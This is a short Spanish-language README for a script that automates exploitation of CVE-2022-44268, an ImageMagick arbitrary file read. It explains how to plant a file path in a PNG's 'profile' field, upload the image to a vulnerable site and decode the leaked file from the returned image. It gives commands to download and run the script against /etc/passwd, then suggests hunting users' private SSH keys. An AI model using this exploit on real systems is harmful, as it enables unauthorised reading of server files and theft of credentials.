
Automatización de la Explotación de CVE-2022-44268 ImageMagick Lectura Arbitraria de Archivos

Automatizando la explotación de CVE-2022-44268 ImageMagick Arbitrary File Read
Hallazgo original: https://www.metabaseq.com/imagemagick-zero-days/
Repositorio del PoC: https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC
ImageMagick interpretará la cadena de texto "profile" como un nombre de archivo y cargará el contenido como un perfil sin procesar, luego el atacante puede descargar la imagen redimensionada que contendrá el contenido de un archivo remoto.
🔴 Toma un archivo PNG, agrega una ruta de archivo al campo EXIF "profile", envíalo a un sitio web que use una versión afectada de ImageMagick, este interpreta la ruta del archivo, carga su contenido en el campo EXIF, descargas la imagen, extraes los datos HEX en el campo "Raw Profile Type" y los conviertes a ASCII para leer el archivo remoto.
Versiones afectadas: ImageMagick 7.1.0-49
sudo apt install pngcrush imagemagick exiftool exiv2 -y
wget https://github.com/narekkay/auto-cve-2022-44268.sh/releases/download/auto-cve-2022-44268.sh/auto-cve-2022-44268.sh
wget https://github.com/narekkay/auto-cve-2022-44268.sh/releases/download/auto-cve-2022-44268.sh/flag.png
chmod +x auto-cve-2022-44268.sh
./auto-cve-2022-44268.sh <image name> <file to read>
./auto-cve-2022-44268.sh flag.png /etc/passwd
Una vez que obtengas usuarios de /etc/passwd, intenta enumerar claves SSH privadas desde /home/.ssh// :
No olvides :
imagemagick, exploit, vuln, magick convert, magick resize, exploitation, vulnerabilities, file read, CVE-2022-44268